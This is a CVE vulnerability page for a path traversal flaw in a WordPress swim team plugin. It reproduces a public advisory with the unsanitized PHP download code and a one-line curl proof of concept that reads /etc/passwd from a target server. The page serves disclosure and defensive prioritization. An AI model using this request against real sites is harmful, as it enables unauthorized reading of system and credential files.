CVE-2015-5471
Description
Absolute path traversal vulnerability in include/user/download.php in the Swim Team plugin 1.44.10777 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
WordPress Plugin Swim Team 1.44.10777 - Arbitrary File Download
Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:
50 $file = urldecode($args['file']) ;
51 $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;
52
53 while (!feof($fh))
54 $txt .= fread($fh, 1024) ;
55
56 // Clean up the temporary file - permissions
57 // may prevent this from succeedeing so use the '@'
58 // to suppress any messages from PHP.
59
60 @unlink($file) ;
61 }
62
63 $filename = urldecode($args['filename']) ;
64 $contenttype = urldecode($args['contenttype']) ;
65
66 // Tell browser to expect a text file of some sort (usually txt or csv)
67
68 header(sprintf('Content-Type: application/%s', $contenttype)) ;
69 header(sprintf('Content-disposition: attachment; filename=%s', $filename)) ;
70 print $txt ;
CVEID:
OSVDB:
Exploit Code:
โข $ curl "http://server/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| swim_team_project | swim_team | 1.44.10777 | |
References
- http://michaelwalsh.org/blog/2015/07/wp-swimteam-v1-45-beta-3-now-available/
- http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html
- http://www.securityfocus.com/bid/75600
- http://www.vapid.dhs.org/advisory.php?v=134
- https://wordpress.org/support/topic/security-vulnerability-6
- https://wpvulndb.com/vulnerabilities/8071
- http://michaelwalsh.org/blog/2015/07/wp-swimteam-v1-45-beta-3-now-available/
- http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html
- http://www.securityfocus.com/bid/75600
- http://www.vapid.dhs.org/advisory.php?v=134
- https://wordpress.org/support/topic/security-vulnerability-6
- https://wpvulndb.com/vulnerabilities/8071
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.